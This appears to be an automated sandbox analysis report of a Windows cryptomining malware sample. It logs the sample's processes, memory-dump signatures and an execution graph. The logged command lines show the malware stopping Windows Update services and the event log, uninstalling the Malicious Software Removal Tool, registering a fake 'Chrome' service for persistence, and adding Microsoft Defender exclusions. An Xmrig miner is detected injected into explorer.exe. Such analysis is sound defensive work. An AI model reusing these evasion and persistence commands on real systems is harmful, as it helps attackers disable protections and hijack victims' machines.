                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:21
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:22
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:23
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe delete "Chrome"
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:24
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:25
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto"
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:26
                                                                                                      Start time:08:02:39
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:27
                                                                                                      Start time:08:02:40
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:28
                                                                                                      Start time:08:02:40
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe start "Chrome"
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:29
                                                                                                      Start time:08:02:40
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:30
                                                                                                      Start time:08:02:40
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6fab70000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:31
                                                                                                      Start time:08:02:40
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\ProgramData\Chrome.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\ProgramData\Chrome.exe
                                                                                                      Imagebase:0x7ff795bf0000
                                                                                                      File size:5'288'736 bytes
                                                                                                      MD5 hash:1A67A432E7AB0BCD2189F3F4142F2AE4
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 76%, ReversingLabs
                                                                                                      Has exited:true

                                                                                                      Target ID:32
                                                                                                      Start time:08:02:41
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                      Imagebase:0x7ff760310000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:33
                                                                                                      Start time:08:02:41
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:34
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                      Imagebase:0x7ff716550000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:35
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:36
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:37
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:38
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\wusa.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                      Imagebase:0x7ff66e720000
                                                                                                      File size:345'088 bytes
                                                                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:39
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:40
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:41
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:42
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:43
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:44
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:45
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\sc.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                                      Imagebase:0x7ff67f960000
                                                                                                      File size:72'192 bytes
                                                                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:46
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:47
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe
                                                                                                      Imagebase:0x7ff70f010000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Target ID:48
                                                                                                      Start time:08:02:43
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:explorer.exe
                                                                                                      Imagebase:0x7ff633410000
                                                                                                      File size:5'141'208 bytes
                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000030.00000002.3883473014.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:false

                                                                                                      Reset < >
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1569823203.00007FF8880E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff8880e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: bJ
                                                                                                        • API String ID: 0-3573994042
                                                                                                        • Opcode ID: 52da744defe643a5fc485fc4efb89a64691391b64253502f0c0267a2e7605424
                                                                                                        • Instruction ID: 44a04ba9aaa896c59148536c2fbbebbeaaff6f9dcf4d5185ce2d91273df47929
                                                                                                        • Opcode Fuzzy Hash: 52da744defe643a5fc485fc4efb89a64691391b64253502f0c0267a2e7605424
                                                                                                        • Instruction Fuzzy Hash: 9D911822E1DA8A4FFB59966858561BA37D1FF562A0F1800BFD44DC31D3DE2DAC05C385
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1569823203.00007FF8880E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff8880e0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ee9e918e0fe45d066cacc097d723c46a024cb0ed5213d9aa185e0c4cf67b0830
                                                                                                        • Instruction ID: 6abdec18de1a92d1215ee3d06e636595e15f14931ae9186c9cf4aa53cb198fb7
                                                                                                        • Opcode Fuzzy Hash: ee9e918e0fe45d066cacc097d723c46a024cb0ed5213d9aa185e0c4cf67b0830
                                                                                                        • Instruction Fuzzy Hash: 4421C022E1EA4B4FFF999A6854912BA76D1FF412A0F6800BED04DC34D3DE2DA844C249
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1569446851.00007FF888010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888010000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff888010000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction ID: 716299687465549df30901e2fa383faae190dd07c2821402761980b7b28b6e4f
                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction Fuzzy Hash: 5401677111CB0D8FDB48EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB46
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1569446851.00007FF888010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888010000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff888010000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (0#$8,#$p0#$/#
                                                                                                        • API String ID: 0-2389384893
                                                                                                        • Opcode ID: ce58813d26f051af2cee783f59ce23d49ea4231d9cfa95d16038522f489976f3
                                                                                                        • Instruction ID: 4bcd50fe5a22f9f40698a4e362a9da10cccc690be672e0893f6ff53600378554
                                                                                                        • Opcode Fuzzy Hash: ce58813d26f051af2cee783f59ce23d49ea4231d9cfa95d16038522f489976f3
                                                                                                        • Instruction Fuzzy Hash: E941A3ABD0E6C28FE71686781CA60797F61BF136A0B1D40FBC0C8CA4E7D6189945C35A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.1636895627.00007FF795D51000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF795D50000, based on PE: true
                                                                                                        • Associated: 00000006.00000002.1636874226.00007FF795D50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.1636945884.00007FF795D5B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.1636977671.00007FF795D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.1637025820.00007FF795D5F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.1637454712.00007FF796257000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.1637479415.00007FF796259000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000006.00000002.1637511631.00007FF79625C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_7ff795d50000_1348.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                                                                        • Instruction ID: da6d8820999f4ec56652ffaddc9bb483b51a777129aa6414c339ab7015a7951b
                                                                                                        • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                                                                        • Instruction Fuzzy Hash: 2EB0922090521984E2103B65D881269A2A06B09B41F802030C41D02356CA6D50824B20
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000001F.00000002.1670466585.00007FF795BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF795BF0000, based on PE: true
                                                                                                        • Associated: 0000001F.00000002.1670443903.00007FF795BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 0000001F.00000002.1670491435.00007FF795BFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 0000001F.00000002.1670514216.00007FF795BFE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 0000001F.00000002.1670754139.00007FF795E80000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 0000001F.00000002.1670984779.00007FF7960F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 0000001F.00000002.1671020363.00007FF7960F9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 0000001F.00000002.1671047503.00007FF7960FC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_31_2_7ff795bf0000_Chrome.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                                                                        • Instruction ID: 9a285e3f7474fff9f5579c1b095aa83190b89df5a76ccabc7675156961780b13
                                                                                                        • Opcode Fuzzy Hash: 09aa500106249f898c70f176d5dd8b6a7b84f69ff7d021052aa52de95c06f874
                                                                                                        • Instruction Fuzzy Hash: 3AB0922090421984E2113B21D84226876A06B08B40F900420C80C02352CA6E50404B20

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.2%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:13.6%
                                                                                                        Total number of Nodes:897
                                                                                                        Total number of Limit Nodes:2
                                                                                                        execution_graph 2986 140001ac3 2989 140001a70 2986->2989 2987 14000199e 2991 140001a0f 2987->2991 2993 1400019e9 VirtualProtect 2987->2993 2988 140001b36 2990 140001ba0 4 API calls 2988->2990 2989->2987 2989->2988 2992 140001b53 2989->2992 2990->2992 2993->2987 2090 140001ae4 2091 140001a70 2090->2091 2092 14000199e 2091->2092 2093 140001b36 2091->2093 2096 140001b53 2091->2096 2095 140001a0f 2092->2095 2097 1400019e9 VirtualProtect 2092->2097 2098 140001ba0 2093->2098 2097->2092 2100 140001bc2 2098->2100 2099 140001c04 memcpy 2099->2096 2100->2099 2102 140001c45 VirtualQuery 2100->2102 2103 140001cf4 2100->2103 2102->2103 2107 140001c72 2102->2107 2104 140001d23 GetLastError 2103->2104 2105 140001d37 2104->2105 2106 140001ca4 VirtualProtect 2106->2099 2106->2104 2107->2099 2107->2106 2135 140001404 2208 140001394 2135->2208 2137 140001413 2138 140001394 2 API calls 2137->2138 2139 140001422 2138->2139 2140 140001394 2 API calls 2139->2140 2141 140001431 2140->2141 2142 140001394 2 API calls 2141->2142 2143 140001440 2142->2143 2144 140001394 2 API calls 2143->2144 2145 14000144f 2144->2145 2146 140001394 2 API calls 2145->2146 2147 14000145e 2146->2147 2148 140001394 2 API calls 2147->2148 2149 14000146d 2148->2149 2150 140001394 2 API calls 2149->2150 2151 14000147c 2150->2151 2152 140001394 2 API calls 2151->2152 2153 14000148b 2152->2153 2154 140001394 2 API calls 2153->2154 2155 14000149a 2154->2155 2156 140001394 2 API calls 2155->2156 2157 1400014a9 2156->2157 2158 140001394 2 API calls 2157->2158 2159 1400014b8 2158->2159 2160 140001394 2 API calls 2159->2160 2161 1400014c7 2160->2161 2162 140001394 2 API calls 2161->2162 2163 1400014d6 2162->2163 2164 1400014e5 2163->2164 2165 140001394 2 API calls 2163->2165 2166 140001394 2 API calls 2164->2166 2165->2164 2167 1400014ef 2166->2167 2168 1400014f4 2167->2168 2169 140001394 2 API calls 2167->2169 2170 140001394 2 API calls 2168->2170 2169->2168 2171 1400014fe 2170->2171 2172 140001503 2171->2172 2173 140001394 2 API calls 2171->2173 2174 140001394 2 API calls 2172->2174 2173->2172 2175 14000150d 2174->2175 2176 140001394 2 API calls 2175->2176 2177 140001512 2176->2177 2178 140001394 2 API calls 2177->2178 2179 140001521 2178->2179 2180 140001394 2 API calls 2179->2180 2181 140001530 2180->2181 2182 140001394 2 API calls 2181->2182 2183 14000153f 2182->2183 2184 140001394 2 API calls 2183->2184 2185 14000154e 2184->2185 2186 140001394 2 API calls 2185->2186 2187 14000155d 2186->2187 2188 140001394 2 API calls 2187->2188 2189 14000156c 2188->2189 2190 140001394 2 API calls 2189->2190 2191 14000157b 2190->2191 2192 140001394 2 API calls 2191->2192 2193 14000158a 2192->2193 2194 140001394 2 API calls 2193->2194 2195 140001599 2194->2195 2196 140001394 2 API calls 2195->2196 2197 1400015a8 2196->2197 2198 140001394 2 API calls 2197->2198 2199 1400015b7 2198->2199 2200 140001394 2 API calls 2199->2200 2201 1400015c6 2200->2201 2202 140001394 2 API calls 2201->2202 2203 1400015d5 2202->2203 2204 140001394 2 API calls 2203->2204 2205 1400015e4 2204->2205 2206 140001394 2 API calls 2205->2206 2207 1400015f3 2206->2207 2209 140006520 malloc 2208->2209 2210 1400013b8 2209->2210 2211 1400013c6 NtDelayExecution 2210->2211 2211->2137 2212 140002104 2213 140002111 EnterCriticalSection 2212->2213 2217 140002218 2212->2217 2215 14000220b LeaveCriticalSection 2213->2215 2220 14000212e 2213->2220 2214 140002272 2215->2217 2216 140002241 DeleteCriticalSection 2216->2214 2217->2214 2217->2216 2219 140002230 free 2217->2219 2218 14000214d TlsGetValue GetLastError 2218->2220 2219->2216 2219->2219 2220->2215 2220->2218 2108 140001e65 2109 140001e67 signal 2108->2109 2110 140001e7c 2109->2110 2112 140001e99 2109->2112 2111 140001e82 signal 2110->2111 2110->2112 2111->2112 2994 140001f47 2995 140001e67 signal 2994->2995 2996 140001e99 2994->2996 2995->2996 2997 140001e7c 2995->2997 2997->2996 2998 140001e82 signal 2997->2998 2998->2996 2113 14000216f 2114 140002178 InitializeCriticalSection 2113->2114 2115 140002185 2113->2115 2114->2115 2116 140001a70 2119 14000199e 2116->2119 2120 140001a7d 2116->2120 2117 140001a0f 2118 1400019e9 VirtualProtect 2118->2119 2119->2117 2119->2118 2120->2116 2121 140001b53 2120->2121 2122 140001b36 2120->2122 2123 140001ba0 4 API calls 2122->2123 2123->2121 2221 140001e10 2222 140001e2f 2221->2222 2223 140001ecc 2222->2223 2227 140001eb5 2222->2227 2228 140001e55 2222->2228 2224 140001ed3 signal 2223->2224 2223->2227 2225 140001ee4 2224->2225 2224->2227 2226 140001eea signal 2225->2226 2225->2227 2226->2227 2228->2227 2229 140001f12 signal 2228->2229 2229->2227 2999 140002050 3000 14000205e EnterCriticalSection 2999->3000 3001 1400020cf 2999->3001 3002 1400020c2 LeaveCriticalSection 3000->3002 3003 140002079 3000->3003 3002->3001 3003->3002 3004 1400020bd free 3003->3004 3004->3002 3005 140001fd0 3006 140001fe4 3005->3006 3007 140002033 3005->3007 3006->3007 3008 140001ffd EnterCriticalSection LeaveCriticalSection 3006->3008 3008->3007 2238 140001ab3 2239 140001a70 2238->2239 2239->2238 2240 14000199e 2239->2240 2241 140001b36 2239->2241 2244 140001b53 2239->2244 2243 140001a0f 2240->2243 2245 1400019e9 VirtualProtect 2240->2245 2242 140001ba0 4 API calls 2241->2242 2242->2244 2245->2240 2080 140001394 2084 140006520 2080->2084 2082 1400013b8 2083 1400013c6 NtDelayExecution 2082->2083 2085 14000653e 2084->2085 2088 14000656b 2084->2088 2085->2082 2086 140006613 2087 14000662f malloc 2086->2087 2089 